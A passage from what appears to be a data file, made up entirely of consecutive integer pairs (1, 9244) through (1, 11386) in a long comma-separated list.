9244), (1, 9245), (1, 9246), (1, 9247), (1, 9248), (1, 9249), (1, 9250), (1, 9251), (1, 9252), (1, 9253), (1, 9254), (1, 9255), (1, 9256), (1, 9257), (1, 9258), (1, 9259), (1, 9260), (1, 9261), (1, 9262), (1, 9263), (1, 9264), (1, 9265), (1, 9266), (1, 9267), (1, 9268), (1, 9269), (1, 9270), (1, 9271), (1, 9272), (1, 9273), (1, 9274), (1, 9275), (1, 9276), (1, 9277), (1, 9278), (1, 9279), (1, 9280), (1, 9281), (1, 9282), (1, 9283), (1, 9284), (1, 9285), (1, 9286), (1, 9287), (1, 9288), (1, 9289), (1, 9290), (1, 9291), (1, 9292), (1, 9293), (1, 9294), (1, 9295), (1, 9296), (1, 9297), (1, 9298), (1, 9299), (1, 9300), (1, 9301), (1, 9302), (1, 9303), (1, 9304), (1, 9305), (1, 9306), (1, 9307), (1, 9308), (1, 9309), (1, 9310), (1, 9311), (1, 9312), (1, 9313), (1, 9314), (1, 9315), (1, 9316), (1, 9317), (1, 9318), (1, 9319), (1, 9320), (1, 9321), (1, 9322), (1, 9323), (1, 9324), (1, 9325), (1, 9326), (1, 9327), (1, 9328), (1, 9329), (1, 9330), (1, 9331), (1, 9332), (1, 9333), (1, 9334), (1, 9335), (1, 9336), (1, 9337), (1, 9338), (1, 9339), (1, 9340), (1, 9341), (1, 9342), (1, 9343), (1, 9344), (1, 9345), (1, 9346), (1, 9347), (1, 9348), (1, 9349), (1, 9350), (1, 9351), (1, 9352), (1, 9353), (1, 9354), (1, 9355), (1, 9356), (1, 9357), (1, 9358), (1, 9359), (1, 9360), (1, 9361), (1, 9362), (1, 9363), (1, 9364), (1, 9365), (1, 9366), (1, 9367), (1, 9368), (1, 9369), (1, 9370), (1, 9371), (1, 9372), (1, 9373), (1, 9374), (1, 9375), (1, 9376), (1, 9377), (1, 9378), (1, 9379), (1, 9380), (1, 9381), (1, 9382), (1, 9383), (1, 9384), (1, 9385), (1, 9386), (1, 9387), (1, 9388), (1, 9389), (1, 9390), (1, 9391), (1, 9392), (1, 9393), (1, 9394), (1, 9395), (1, 9396), (1, 9397), (1, 9398), (1, 9399), (1, 9400), (1, 9401), (1, 9402), (1, 9403), (1, 9404), (1, 9405), (1, 9406), (1, 9407), (1, 9408), (1, 9409), (1, 9410), (1, 9411), (1, 9412), (1, 9413), (1, 9414), (1, 9415), (1, 9416), (1, 9417), (1, 9418), (1, 9419), (1, 9420), (1, 9421), (1, 9422), (1, 9423), (1, 9424), (1, 9425), (1, 9426), (1, 9427), (1, 9428), (1, 9429), (1, 9430), (1, 9431), (1, 9432), (1, 9433), (1, 9434), (1, 9435), (1, 9436), (1, 9437), (1, 9438), (1, 9439), (1, 9440), (1, 9441), (1, 9442), (1, 9443), (1, 9444), (1, 9445), (1, 9446), (1, 9447), (1, 9448), (1, 9449), (1, 9450), (1, 9451), (1, 9452), (1, 9453), (1, 9454), (1, 9455), (1, 9456), (1, 9457), (1, 9458), (1, 9459), (1, 9460), (1, 9461), (1, 9462), (1, 9463), (1, 9464), (1, 9465), (1, 9466), (1, 9467), (1, 9468), (1, 9469), (1, 9470), (1, 9471), (1, 9472), (1, 9473), (1, 9474), (1, 9475), (1, 9476), (1, 9477), (1, 9478), (1, 9479), (1, 9480), (1, 9481), (1, 9482), (1, 9483), (1, 9484), (1, 9485), (1, 9486), (1, 9487), (1, 9488), (1, 9489), (1, 9490), (1, 9491), (1, 9492), (1, 9493), (1, 9494), (1, 9495), (1, 9496), (1, 9497), (1, 9498), (1, 9499), (1, 9500), (1, 9501), (1, 9502), (1, 9503), (1, 9504), (1, 9505), (1, 9506), (1, 9507), (1, 9508), (1, 9509), (1, 9510), (1, 9511), (1, 9512), (1, 9513), (1, 9514), (1, 9515), (1, 9516), (1, 9517), (1, 9518), (1, 9519), (1, 9520), (1, 9521), (1, 9522), (1, 9523), (1, 9524), (1, 9525), (1, 9526), (1, 9527), (1, 9528), (1, 9529), (1, 9530), (1, 9531), (1, 9532), (1, 9533), (1, 9534), (1, 9535), (1, 9536), (1, 9537), (1, 9538), (1, 9539), (1, 9540), (1, 9541), (1, 9542), (1, 9543), (1, 9544), (1, 9545), (1, 9546), (1, 9547), (1, 9548), (1, 9549), (1, 9550), (1, 9551), (1, 9552), (1, 9553), (1, 9554), (1, 9555), (1, 9556), (1, 9557), (1, 9558), (1, 9559), (1, 9560), (1, 9561), (1, 9562), (1, 9563), (1, 9564), (1, 9565), (1, 9566), (1, 9567), (1, 9568), (1, 9569), (1, 9570), (1, 9571), (1, 9572), (1, 9573), (1, 9574), (1, 9575), (1, 9576), (1, 9577), (1, 9578), (1, 9579), (1, 9580), (1, 9581), (1, 9582), (1, 9583), (1, 9584), (1, 9585), (1, 9586), (1, 9587), (1, 9588), (1, 9589), (1, 9590), (1, 9591), (1, 9592), (1, 9593), (1, 9594), (1, 9595), (1, 9596), (1, 9597), (1, 9598), (1, 9599), (1, 9600), (1, 9601), (1, 9602), (1, 9603), (1, 9604), (1, 9605), (1, 9606), (1, 9607), (1, 9608), (1, 9609), (1, 9610), (1, 9611), (1, 9612), (1, 9613), (1, 9614), (1, 9615), (1, 9616), (1, 9617), (1, 9618), (1, 9619), (1, 9620), (1, 9621), (1, 9622), (1, 9623), (1, 9624), (1, 9625), (1, 9626), (1, 9627), (1, 9628), (1, 9629), (1, 9630), (1, 9631), (1, 9632), (1, 9633), (1, 9634), (1, 9635), (1, 9636), (1, 9637), (1, 9638), (1, 9639), (1, 9640), (1, 9641), (1, 9642), (1, 9643), (1, 9644), (1, 9645), (1, 9646), (1, 9647), (1, 9648), (1, 9649), (1, 9650), (1, 9651), (1, 9652), (1, 9653), (1, 9654), (1, 9655), (1, 9656), (1, 9657), (1, 9658), (1, 9659), (1, 9660), (1, 9661), (1, 9662), (1, 9663), (1, 9664), (1, 9665), (1, 9666), (1, 9667), (1, 9668), (1, 9669), (1, 9670), (1, 9671), (1, 9672), (1, 9673), (1, 9674), (1, 9675), (1, 9676), (1, 9677), (1, 9678), (1, 9679), (1, 9680), (1, 9681), (1, 9682), (1, 9683), (1, 9684), (1, 9685), (1, 9686), (1, 9687), (1, 9688), (1, 9689), (1, 9690), (1, 9691), (1, 9692), (1, 9693), (1, 9694), (1, 9695), (1, 9696), (1, 9697), (1, 9698), (1, 9699), (1, 9700), (1, 9701), (1, 9702), (1, 9703), (1, 9704), (1, 9705), (1, 9706), (1, 9707), (1, 9708), (1, 9709), (1, 9710), (1, 9711), (1, 9712), (1, 9713), (1, 9714), (1, 9715), (1, 9716), (1, 9717), (1, 9718), (1, 9719), (1, 9720), (1, 9721), (1, 9722), (1, 9723), (1, 9724), (1, 9725), (1, 9726), (1, 9727), (1, 9728), (1, 9729), (1, 9730), (1, 9731), (1, 9732), (1, 9733), (1, 9734), (1, 9735), (1, 9736), (1, 9737), (1, 9738), (1, 9739), (1, 9740), (1, 9741), (1, 9742), (1, 9743), (1, 9744), (1, 9745), (1, 9746), (1, 9747), (1, 9748), (1, 9749), (1, 9750), (1, 9751), (1, 9752), (1, 9753), (1, 9754), (1, 9755), (1, 9756), (1, 9757), (1, 9758), (1, 9759), (1, 9760), (1, 9761), (1, 9762), (1, 9763), (1, 9764), (1, 9765), (1, 9766), (1, 9767), (1, 9768), (1, 9769), (1, 9770), (1, 9771), (1, 9772), (1, 9773), (1, 9774), (1, 9775), (1, 9776), (1, 9777), (1, 9778), (1, 9779), (1, 9780), (1, 9781), (1, 9782), (1, 9783), (1, 9784), (1, 9785), (1, 9786), (1, 9787), (1, 9788), (1, 9789), (1, 9790), (1, 9791), (1, 9792), (1, 9793), (1, 9794), (1, 9795), (1, 9796), (1, 9797), (1, 9798), (1, 9799), (1, 9800), (1, 9801), (1, 9802), (1, 9803), (1, 9804), (1, 9805), (1, 9806), (1, 9807), (1, 9808), (1, 9809), (1, 9810), (1, 9811), (1, 9812), (1, 9813), (1, 9814), (1, 9815), (1, 9816), (1, 9817), (1, 9818), (1, 9819), (1, 9820), (1, 9821), (1, 9822), (1, 9823), (1, 9824), (1, 9825), (1, 9826), (1, 9827), (1, 9828), (1, 9829), (1, 9830), (1, 9831), (1, 9832), (1, 9833), (1, 9834), (1, 9835), (1, 9836), (1, 9837), (1, 9838), (1, 9839), (1, 9840), (1, 9841), (1, 9842), (1, 9843), (1, 9844), (1, 9845), (1, 9846), (1, 9847), (1, 9848), (1, 9849), (1, 9850), (1, 9851), (1, 9852), (1, 9853), (1, 9854), (1, 9855), (1, 9856), (1, 9857), (1, 9858), (1, 9859), (1, 9860), (1, 9861), (1, 9862), (1, 9863), (1, 9864), (1, 9865), (1, 9866), (1, 9867), (1, 9868), (1, 9869), (1, 9870), (1, 9871), (1, 9872), (1, 9873), (1, 9874), (1, 9875), (1, 9876), (1, 9877), (1, 9878), (1, 9879), (1, 9880), (1, 9881), (1, 9882), (1, 9883), (1, 9884), (1, 9885), (1, 9886), (1, 9887), (1, 9888), (1, 9889), (1, 9890), (1, 9891), (1, 9892), (1, 9893), (1, 9894), (1, 9895), (1, 9896), (1, 9897), (1, 9898), (1, 9899), (1, 9900), (1, 9901), (1, 9902), (1, 9903), (1, 9904), (1, 9905), (1, 9906), (1, 9907), (1, 9908), (1, 9909), (1, 9910), (1, 9911), (1, 9912), (1, 9913), (1, 9914), (1, 9915), (1, 9916), (1, 9917), (1, 9918), (1, 9919), (1, 9920), (1, 9921), (1, 9922), (1, 9923), (1, 9924), (1, 9925), (1, 9926), (1, 9927), (1, 9928), (1, 9929), (1, 9930), (1, 9931), (1, 9932), (1, 9933), (1, 9934), (1, 9935), (1, 9936), (1, 9937), (1, 9938), (1, 9939), (1, 9940), (1, 9941), (1, 9942), (1, 9943), (1, 9944), (1, 9945), (1, 9946), (1, 9947), (1, 9948), (1, 9949), (1, 9950), (1, 9951), (1, 9952), (1, 9953), (1, 9954), (1, 9955), (1, 9956), (1, 9957), (1, 9958), (1, 9959), (1, 9960), (1, 9961), (1, 9962), (1, 9963), (1, 9964), (1, 9965), (1, 9966), (1, 9967), (1, 9968), (1, 9969), (1, 9970), (1, 9971), (1, 9972), (1, 9973), (1, 9974), (1, 9975), (1, 9976), (1, 9977), (1, 9978), (1, 9979), (1, 9980), (1, 9981), (1, 9982), (1, 9983), (1, 9984), (1, 9985), (1, 9986), (1, 9987), (1, 9988), (1, 9989), (1, 9990), (1, 9991), (1, 9992), (1, 9993), (1, 9994), (1, 9995), (1, 9996), (1, 9997), (1, 9998), (1, 9999), (1, 10000), (1, 10001), (1, 10002), (1, 10003), (1, 10004), (1, 10005), (1, 10006), (1, 10007), (1, 10008), (1, 10009), (1, 10010), (1, 10011), (1, 10012), (1, 10013), (1, 10014), (1, 10015), (1, 10016), (1, 10017), (1, 10018), (1, 10019), (1, 10020), (1, 10021), (1, 10022), (1, 10023), (1, 10024), (1, 10025), (1, 10026), (1, 10027), (1, 10028), (1, 10029), (1, 10030), (1, 10031), (1, 10032), (1, 10033), (1, 10034), (1, 10035), (1, 10036), (1, 10037), (1, 10038), (1, 10039), (1, 10040), (1, 10041), (1, 10042), (1, 10043), (1, 10044), (1, 10045), (1, 10046), (1, 10047), (1, 10048), (1, 10049), (1, 10050), (1, 10051), (1, 10052), (1, 10053), (1, 10054), (1, 10055), (1, 10056), (1, 10057), (1, 10058), (1, 10059), (1, 10060), (1, 10061), (1, 10062), (1, 10063), (1, 10064), (1, 10065), (1, 10066), (1, 10067), (1, 10068), (1, 10069), (1, 10070), (1, 10071), (1, 10072), (1, 10073), (1, 10074), (1, 10075), (1, 10076), (1, 10077), (1, 10078), (1, 10079), (1, 10080), (1, 10081), (1, 10082), (1, 10083), (1, 10084), (1, 10085), (1, 10086), (1, 10087), (1, 10088), (1, 10089), (1, 10090), (1, 10091), (1, 10092), (1, 10093), (1, 10094), (1, 10095), (1, 10096), (1, 10097), (1, 10098), (1, 10099), (1, 10100), (1, 10101), (1, 10102), (1, 10103), (1, 10104), (1, 10105), (1, 10106), (1, 10107), (1, 10108), (1, 10109), (1, 10110), (1, 10111), (1, 10112), (1, 10113), (1, 10114), (1, 10115), (1, 10116), (1, 10117), (1, 10118), (1, 10119), (1, 10120), (1, 10121), (1, 10122), (1, 10123), (1, 10124), (1, 10125), (1, 10126), (1, 10127), (1, 10128), (1, 10129), (1, 10130), (1, 10131), (1, 10132), (1, 10133), (1, 10134), (1, 10135), (1, 10136), (1, 10137), (1, 10138), (1, 10139), (1, 10140), (1, 10141), (1, 10142), (1, 10143), (1, 10144), (1, 10145), (1, 10146), (1, 10147), (1, 10148), (1, 10149), (1, 10150), (1, 10151), (1, 10152), (1, 10153), (1, 10154), (1, 10155), (1, 10156), (1, 10157), (1, 10158), (1, 10159), (1, 10160), (1, 10161), (1, 10162), (1, 10163), (1, 10164), (1, 10165), (1, 10166), (1, 10167), (1, 10168), (1, 10169), (1, 10170), (1, 10171), (1, 10172), (1, 10173), (1, 10174), (1, 10175), (1, 10176), (1, 10177), (1, 10178), (1, 10179), (1, 10180), (1, 10181), (1, 10182), (1, 10183), (1, 10184), (1, 10185), (1, 10186), (1, 10187), (1, 10188), (1, 10189), (1, 10190), (1, 10191), (1, 10192), (1, 10193), (1, 10194), (1, 10195), (1, 10196), (1, 10197), (1, 10198), (1, 10199), (1, 10200), (1, 10201), (1, 10202), (1, 10203), (1, 10204), (1, 10205), (1, 10206), (1, 10207), (1, 10208), (1, 10209), (1, 10210), (1, 10211), (1, 10212), (1, 10213), (1, 10214), (1, 10215), (1, 10216), (1, 10217), (1, 10218), (1, 10219), (1, 10220), (1, 10221), (1, 10222), (1, 10223), (1, 10224), (1, 10225), (1, 10226), (1, 10227), (1, 10228), (1, 10229), (1, 10230), (1, 10231), (1, 10232), (1, 10233), (1, 10234), (1, 10235), (1, 10236), (1, 10237), (1, 10238), (1, 10239), (1, 10240), (1, 10241), (1, 10242), (1, 10243), (1, 10244), (1, 10245), (1, 10246), (1, 10247), (1, 10248), (1, 10249), (1, 10250), (1, 10251), (1, 10252), (1, 10253), (1, 10254), (1, 10255), (1, 10256), (1, 10257), (1, 10258), (1, 10259), (1, 10260), (1, 10261), (1, 10262), (1, 10263), (1, 10264), (1, 10265), (1, 10266), (1, 10267), (1, 10268), (1, 10269), (1, 10270), (1, 10271), (1, 10272), (1, 10273), (1, 10274), (1, 10275), (1, 10276), (1, 10277), (1, 10278), (1, 10279), (1, 10280), (1, 10281), (1, 10282), (1, 10283), (1, 10284), (1, 10285), (1, 10286), (1, 10287), (1, 10288), (1, 10289), (1, 10290), (1, 10291), (1, 10292), (1, 10293), (1, 10294), (1, 10295), (1, 10296), (1, 10297), (1, 10298), (1, 10299), (1, 10300), (1, 10301), (1, 10302), (1, 10303), (1, 10304), (1, 10305), (1, 10306), (1, 10307), (1, 10308), (1, 10309), (1, 10310), (1, 10311), (1, 10312), (1, 10313), (1, 10314), (1, 10315), (1, 10316), (1, 10317), (1, 10318), (1, 10319), (1, 10320), (1, 10321), (1, 10322), (1, 10323), (1, 10324), (1, 10325), (1, 10326), (1, 10327), (1, 10328), (1, 10329), (1, 10330), (1, 10331), (1, 10332), (1, 10333), (1, 10334), (1, 10335), (1, 10336), (1, 10337), (1, 10338), (1, 10339), (1, 10340), (1, 10341), (1, 10342), (1, 10343), (1, 10344), (1, 10345), (1, 10346), (1, 10347), (1, 10348), (1, 10349), (1, 10350), (1, 10351), (1, 10352), (1, 10353), (1, 10354), (1, 10355), (1, 10356), (1, 10357), (1, 10358), (1, 10359), (1, 10360), (1, 10361), (1, 10362), (1, 10363), (1, 10364), (1, 10365), (1, 10366), (1, 10367), (1, 10368), (1, 10369), (1, 10370), (1, 10371), (1, 10372), (1, 10373), (1, 10374), (1, 10375), (1, 10376), (1, 10377), (1, 10378), (1, 10379), (1, 10380), (1, 10381), (1, 10382), (1, 10383), (1, 10384), (1, 10385), (1, 10386), (1, 10387), (1, 10388), (1, 10389), (1, 10390), (1, 10391), (1, 10392), (1, 10393), (1, 10394), (1, 10395), (1, 10396), (1, 10397), (1, 10398), (1, 10399), (1, 10400), (1, 10401), (1, 10402), (1, 10403), (1, 10404), (1, 10405), (1, 10406), (1, 10407), (1, 10408), (1, 10409), (1, 10410), (1, 10411), (1, 10412), (1, 10413), (1, 10414), (1, 10415), (1, 10416), (1, 10417), (1, 10418), (1, 10419), (1, 10420), (1, 10421), (1, 10422), (1, 10423), (1, 10424), (1, 10425), (1, 10426), (1, 10427), (1, 10428), (1, 10429), (1, 10430), (1, 10431), (1, 10432), (1, 10433), (1, 10434), (1, 10435), (1, 10436), (1, 10437), (1, 10438), (1, 10439), (1, 10440), (1, 10441), (1, 10442), (1, 10443), (1, 10444), (1, 10445), (1, 10446), (1, 10447), (1, 10448), (1, 10449), (1, 10450), (1, 10451), (1, 10452), (1, 10453), (1, 10454), (1, 10455), (1, 10456), (1, 10457), (1, 10458), (1, 10459), (1, 10460), (1, 10461), (1, 10462), (1, 10463), (1, 10464), (1, 10465), (1, 10466), (1, 10467), (1, 10468), (1, 10469), (1, 10470), (1, 10471), (1, 10472), (1, 10473), (1, 10474), (1, 10475), (1, 10476), (1, 10477), (1, 10478), (1, 10479), (1, 10480), (1, 10481), (1, 10482), (1, 10483), (1, 10484), (1, 10485), (1, 10486), (1, 10487), (1, 10488), (1, 10489), (1, 10490), (1, 10491), (1, 10492), (1, 10493), (1, 10494), (1, 10495), (1, 10496), (1, 10497), (1, 10498), (1, 10499), (1, 10500), (1, 10501), (1, 10502), (1, 10503), (1, 10504), (1, 10505), (1, 10506), (1, 10507), (1, 10508), (1, 10509), (1, 10510), (1, 10511), (1, 10512), (1, 10513), (1, 10514), (1, 10515), (1, 10516), (1, 10517), (1, 10518), (1, 10519), (1, 10520), (1, 10521), (1, 10522), (1, 10523), (1, 10524), (1, 10525), (1, 10526), (1, 10527), (1, 10528), (1, 10529), (1, 10530), (1, 10531), (1, 10532), (1, 10533), (1, 10534), (1, 10535), (1, 10536), (1, 10537), (1, 10538), (1, 10539), (1, 10540), (1, 10541), (1, 10542), (1, 10543), (1, 10544), (1, 10545), (1, 10546), (1, 10547), (1, 10548), (1, 10549), (1, 10550), (1, 10551), (1, 10552), (1, 10553), (1, 10554), (1, 10555), (1, 10556), (1, 10557), (1, 10558), (1, 10559), (1, 10560), (1, 10561), (1, 10562), (1, 10563), (1, 10564), (1, 10565), (1, 10566), (1, 10567), (1, 10568), (1, 10569), (1, 10570), (1, 10571), (1, 10572), (1, 10573), (1, 10574), (1, 10575), (1, 10576), (1, 10577), (1, 10578), (1, 10579), (1, 10580), (1, 10581), (1, 10582), (1, 10583), (1, 10584), (1, 10585), (1, 10586), (1, 10587), (1, 10588), (1, 10589), (1, 10590), (1, 10591), (1, 10592), (1, 10593), (1, 10594), (1, 10595), (1, 10596), (1, 10597), (1, 10598), (1, 10599), (1, 10600), (1, 10601), (1, 10602), (1, 10603), (1, 10604), (1, 10605), (1, 10606), (1, 10607), (1, 10608), (1, 10609), (1, 10610), (1, 10611), (1, 10612), (1, 10613), (1, 10614), (1, 10615), (1, 10616), (1, 10617), (1, 10618), (1, 10619), (1, 10620), (1, 10621), (1, 10622), (1, 10623), (1, 10624), (1, 10625), (1, 10626), (1, 10627), (1, 10628), (1, 10629), (1, 10630), (1, 10631), (1, 10632), (1, 10633), (1, 10634), (1, 10635), (1, 10636), (1, 10637), (1, 10638), (1, 10639), (1, 10640), (1, 10641), (1, 10642), (1, 10643), (1, 10644), (1, 10645), (1, 10646), (1, 10647), (1, 10648), (1, 10649), (1, 10650), (1, 10651), (1, 10652), (1, 10653), (1, 10654), (1, 10655), (1, 10656), (1, 10657), (1, 10658), (1, 10659), (1, 10660), (1, 10661), (1, 10662), (1, 10663), (1, 10664), (1, 10665), (1, 10666), (1, 10667), (1, 10668), (1, 10669), (1, 10670), (1, 10671), (1, 10672), (1, 10673), (1, 10674), (1, 10675), (1, 10676), (1, 10677), (1, 10678), (1, 10679), (1, 10680), (1, 10681), (1, 10682), (1, 10683), (1, 10684), (1, 10685), (1, 10686), (1, 10687), (1, 10688), (1, 10689), (1, 10690), (1, 10691), (1, 10692), (1, 10693), (1, 10694), (1, 10695), (1, 10696), (1, 10697), (1, 10698), (1, 10699), (1, 10700), (1, 10701), (1, 10702), (1, 10703), (1, 10704), (1, 10705), (1, 10706), (1, 10707), (1, 10708), (1, 10709), (1, 10710), (1, 10711), (1, 10712), (1, 10713), (1, 10714), (1, 10715), (1, 10716), (1, 10717), (1, 10718), (1, 10719), (1, 10720), (1, 10721), (1, 10722), (1, 10723), (1, 10724), (1, 10725), (1, 10726), (1, 10727), (1, 10728), (1, 10729), (1, 10730), (1, 10731), (1, 10732), (1, 10733), (1, 10734), (1, 10735), (1, 10736), (1, 10737), (1, 10738), (1, 10739), (1, 10740), (1, 10741), (1, 10742), (1, 10743), (1, 10744), (1, 10745), (1, 10746), (1, 10747), (1, 10748), (1, 10749), (1, 10750), (1, 10751), (1, 10752), (1, 10753), (1, 10754), (1, 10755), (1, 10756), (1, 10757), (1, 10758), (1, 10759), (1, 10760), (1, 10761), (1, 10762), (1, 10763), (1, 10764), (1, 10765), (1, 10766), (1, 10767), (1, 10768), (1, 10769), (1, 10770), (1, 10771), (1, 10772), (1, 10773), (1, 10774), (1, 10775), (1, 10776), (1, 10777), (1, 10778), (1, 10779), (1, 10780), (1, 10781), (1, 10782), (1, 10783), (1, 10784), (1, 10785), (1, 10786), (1, 10787), (1, 10788), (1, 10789), (1, 10790), (1, 10791), (1, 10792), (1, 10793), (1, 10794), (1, 10795), (1, 10796), (1, 10797), (1, 10798), (1, 10799), (1, 10800), (1, 10801), (1, 10802), (1, 10803), (1, 10804), (1, 10805), (1, 10806), (1, 10807), (1, 10808), (1, 10809), (1, 10810), (1, 10811), (1, 10812), (1, 10813), (1, 10814), (1, 10815), (1, 10816), (1, 10817), (1, 10818), (1, 10819), (1, 10820), (1, 10821), (1, 10822), (1, 10823), (1, 10824), (1, 10825), (1, 10826), (1, 10827), (1, 10828), (1, 10829), (1, 10830), (1, 10831), (1, 10832), (1, 10833), (1, 10834), (1, 10835), (1, 10836), (1, 10837), (1, 10838), (1, 10839), (1, 10840), (1, 10841), (1, 10842), (1, 10843), (1, 10844), (1, 10845), (1, 10846), (1, 10847), (1, 10848), (1, 10849), (1, 10850), (1, 10851), (1, 10852), (1, 10853), (1, 10854), (1, 10855), (1, 10856), (1, 10857), (1, 10858), (1, 10859), (1, 10860), (1, 10861), (1, 10862), (1, 10863), (1, 10864), (1, 10865), (1, 10866), (1, 10867), (1, 10868), (1, 10869), (1, 10870), (1, 10871), (1, 10872), (1, 10873), (1, 10874), (1, 10875), (1, 10876), (1, 10877), (1, 10878), (1, 10879), (1, 10880), (1, 10881), (1, 10882), (1, 10883), (1, 10884), (1, 10885), (1, 10886), (1, 10887), (1, 10888), (1, 10889), (1, 10890), (1, 10891), (1, 10892), (1, 10893), (1, 10894), (1, 10895), (1, 10896), (1, 10897), (1, 10898), (1, 10899), (1, 10900), (1, 10901), (1, 10902), (1, 10903), (1, 10904), (1, 10905), (1, 10906), (1, 10907), (1, 10908), (1, 10909), (1, 10910), (1, 10911), (1, 10912), (1, 10913), (1, 10914), (1, 10915), (1, 10916), (1, 10917), (1, 10918), (1, 10919), (1, 10920), (1, 10921), (1, 10922), (1, 10923), (1, 10924), (1, 10925), (1, 10926), (1, 10927), (1, 10928), (1, 10929), (1, 10930), (1, 10931), (1, 10932), (1, 10933), (1, 10934), (1, 10935), (1, 10936), (1, 10937), (1, 10938), (1, 10939), (1, 10940), (1, 10941), (1, 10942), (1, 10943), (1, 10944), (1, 10945), (1, 10946), (1, 10947), (1, 10948), (1, 10949), (1, 10950), (1, 10951), (1, 10952), (1, 10953), (1, 10954), (1, 10955), (1, 10956), (1, 10957), (1, 10958), (1, 10959), (1, 10960), (1, 10961), (1, 10962), (1, 10963), (1, 10964), (1, 10965), (1, 10966), (1, 10967), (1, 10968), (1, 10969), (1, 10970), (1, 10971), (1, 10972), (1, 10973), (1, 10974), (1, 10975), (1, 10976), (1, 10977), (1, 10978), (1, 10979), (1, 10980), (1, 10981), (1, 10982), (1, 10983), (1, 10984), (1, 10985), (1, 10986), (1, 10987), (1, 10988), (1, 10989), (1, 10990), (1, 10991), (1, 10992), (1, 10993), (1, 10994), (1, 10995), (1, 10996), (1, 10997), (1, 10998), (1, 10999), (1, 11000), (1, 11001), (1, 11002), (1, 11003), (1, 11004), (1, 11005), (1, 11006), (1, 11007), (1, 11008), (1, 11009), (1, 11010), (1, 11011), (1, 11012), (1, 11013), (1, 11014), (1, 11015), (1, 11016), (1, 11017), (1, 11018), (1, 11019), (1, 11020), (1, 11021), (1, 11022), (1, 11023), (1, 11024), (1, 11025), (1, 11026), (1, 11027), (1, 11028), (1, 11029), (1, 11030), (1, 11031), (1, 11032), (1, 11033), (1, 11034), (1, 11035), (1, 11036), (1, 11037), (1, 11038), (1, 11039), (1, 11040), (1, 11041), (1, 11042), (1, 11043), (1, 11044), (1, 11045), (1, 11046), (1, 11047), (1, 11048), (1, 11049), (1, 11050), (1, 11051), (1, 11052), (1, 11053), (1, 11054), (1, 11055), (1, 11056), (1, 11057), (1, 11058), (1, 11059), (1, 11060), (1, 11061), (1, 11062), (1, 11063), (1, 11064), (1, 11065), (1, 11066), (1, 11067), (1, 11068), (1, 11069), (1, 11070), (1, 11071), (1, 11072), (1, 11073), (1, 11074), (1, 11075), (1, 11076), (1, 11077), (1, 11078), (1, 11079), (1, 11080), (1, 11081), (1, 11082), (1, 11083), (1, 11084), (1, 11085), (1, 11086), (1, 11087), (1, 11088), (1, 11089), (1, 11090), (1, 11091), (1, 11092), (1, 11093), (1, 11094), (1, 11095), (1, 11096), (1, 11097), (1, 11098), (1, 11099), (1, 11100), (1, 11101), (1, 11102), (1, 11103), (1, 11104), (1, 11105), (1, 11106), (1, 11107), (1, 11108), (1, 11109), (1, 11110), (1, 11111), (1, 11112), (1, 11113), (1, 11114), (1, 11115), (1, 11116), (1, 11117), (1, 11118), (1, 11119), (1, 11120), (1, 11121), (1, 11122), (1, 11123), (1, 11124), (1, 11125), (1, 11126), (1, 11127), (1, 11128), (1, 11129), (1, 11130), (1, 11131), (1, 11132), (1, 11133), (1, 11134), (1, 11135), (1, 11136), (1, 11137), (1, 11138), (1, 11139), (1, 11140), (1, 11141), (1, 11142), (1, 11143), (1, 11144), (1, 11145), (1, 11146), (1, 11147), (1, 11148), (1, 11149), (1, 11150), (1, 11151), (1, 11152), (1, 11153), (1, 11154), (1, 11155), (1, 11156), (1, 11157), (1, 11158), (1, 11159), (1, 11160), (1, 11161), (1, 11162), (1, 11163), (1, 11164), (1, 11165), (1, 11166), (1, 11167), (1, 11168), (1, 11169), (1, 11170), (1, 11171), (1, 11172), (1, 11173), (1, 11174), (1, 11175), (1, 11176), (1, 11177), (1, 11178), (1, 11179), (1, 11180), (1, 11181), (1, 11182), (1, 11183), (1, 11184), (1, 11185), (1, 11186), (1, 11187), (1, 11188), (1, 11189), (1, 11190), (1, 11191), (1, 11192), (1, 11193), (1, 11194), (1, 11195), (1, 11196), (1, 11197), (1, 11198), (1, 11199), (1, 11200), (1, 11201), (1, 11202), (1, 11203), (1, 11204), (1, 11205), (1, 11206), (1, 11207), (1, 11208), (1, 11209), (1, 11210), (1, 11211), (1, 11212), (1, 11213), (1, 11214), (1, 11215), (1, 11216), (1, 11217), (1, 11218), (1, 11219), (1, 11220), (1, 11221), (1, 11222), (1, 11223), (1, 11224), (1, 11225), (1, 11226), (1, 11227), (1, 11228), (1, 11229), (1, 11230), (1, 11231), (1, 11232), (1, 11233), (1, 11234), (1, 11235), (1, 11236), (1, 11237), (1, 11238), (1, 11239), (1, 11240), (1, 11241), (1, 11242), (1, 11243), (1, 11244), (1, 11245), (1, 11246), (1, 11247), (1, 11248), (1, 11249), (1, 11250), (1, 11251), (1, 11252), (1, 11253), (1, 11254), (1, 11255), (1, 11256), (1, 11257), (1, 11258), (1, 11259), (1, 11260), (1, 11261), (1, 11262), (1, 11263), (1, 11264), (1, 11265), (1, 11266), (1, 11267), (1, 11268), (1, 11269), (1, 11270), (1, 11271), (1, 11272), (1, 11273), (1, 11274), (1, 11275), (1, 11276), (1, 11277), (1, 11278), (1, 11279), (1, 11280), (1, 11281), (1, 11282), (1, 11283), (1, 11284), (1, 11285), (1, 11286), (1, 11287), (1, 11288), (1, 11289), (1, 11290), (1, 11291), (1, 11292), (1, 11293), (1, 11294), (1, 11295), (1, 11296), (1, 11297), (1, 11298), (1, 11299), (1, 11300), (1, 11301), (1, 11302), (1, 11303), (1, 11304), (1, 11305), (1, 11306), (1, 11307), (1, 11308), (1, 11309), (1, 11310), (1, 11311), (1, 11312), (1, 11313), (1, 11314), (1, 11315), (1, 11316), (1, 11317), (1, 11318), (1, 11319), (1, 11320), (1, 11321), (1, 11322), (1, 11323), (1, 11324), (1, 11325), (1, 11326), (1, 11327), (1, 11328), (1, 11329), (1, 11330), (1, 11331), (1, 11332), (1, 11333), (1, 11334), (1, 11335), (1, 11336), (1, 11337), (1, 11338), (1, 11339), (1, 11340), (1, 11341), (1, 11342), (1, 11343), (1, 11344), (1, 11345), (1, 11346), (1, 11347), (1, 11348), (1, 11349), (1, 11350), (1, 11351), (1, 11352), (1, 11353), (1, 11354), (1, 11355), (1, 11356), (1, 11357), (1, 11358), (1, 11359), (1, 11360), (1, 11361), (1, 11362), (1, 11363), (1, 11364), (1, 11365), (1, 11366), (1, 11367), (1, 11368), (1, 11369), (1, 11370), (1, 11371), (1, 11372), (1, 11373), (1, 11374), (1, 11375), (1, 11376), (1, 11377), (1, 11378), (1, 11379), (1, 11380), (1, 11381), (1, 11382), (1, 11383), (1, 11384), (1, 11385), (1, 11386), 